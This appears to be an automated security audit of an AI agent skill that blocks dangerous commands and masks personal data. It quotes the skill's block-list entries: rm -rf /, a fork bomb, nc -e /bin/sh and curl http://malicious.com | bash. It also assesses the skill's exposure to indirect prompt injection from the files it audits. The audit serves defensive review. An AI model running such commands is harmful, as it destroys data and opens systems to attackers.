skill-security
Pass
Audited by Gen Agent Trust Hub on Apr 18, 2026
Risk Level: SAFE
Categories flagged: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The file references/command-blacklist.md contains examples of destructive shell commands (e.g., rm -rf /, dd if=/dev/zero), fork bombs (:(){ :|:& };:), and reverse shell patterns (nc -e /bin/sh). These are documented specifically as 'KESİN RED' (Absolute Rejection) entries to define behavior the agent must block in other skills.
- [REMOTE_CODE_EXECUTION]: The skill documentation in SKILL.md and references/command-blacklist.md includes the pattern curl http://malicious.com | bash. This is used as a placeholder in an example violation report and as an RCE pattern to be detected and blocked.
- [EXTERNAL_DOWNLOADS]: The skill defines a whitelist of trusted domains in references/api-whitelist.md, including well-known infrastructure and AI providers such as Amazon AWS, Google Cloud, Azure, Anthropic, and OpenAI.
- [DATA_EXFILTRATION]: references/pii-patterns.md contains regex patterns for detecting and masking sensitive data like Turkish ID numbers, credit card information, and API keys for various services. This is a protective measure to prevent the accidental exposure of sensitive user data.
- [PROMPT_INJECTION]: The skill operates on untrusted data from other skills, creating an attack surface for indirect prompt injection.
  - Ingestion points: The skill ingests and analyzes external SKILL.md files during its 'Audit' mode.
  - Boundary markers: The instructions do not specify strict delimiters or isolation protocols for the content being audited.
  - Capability inventory: The skill has the capability to write security audit reports and violation logs to the local file system (docs/security/).
  - Sanitization: While the skill describes a methodology for sanitization and least-privilege, it relies on prompt-based logic rather than rigid code-level enforcement.
Audit Metadata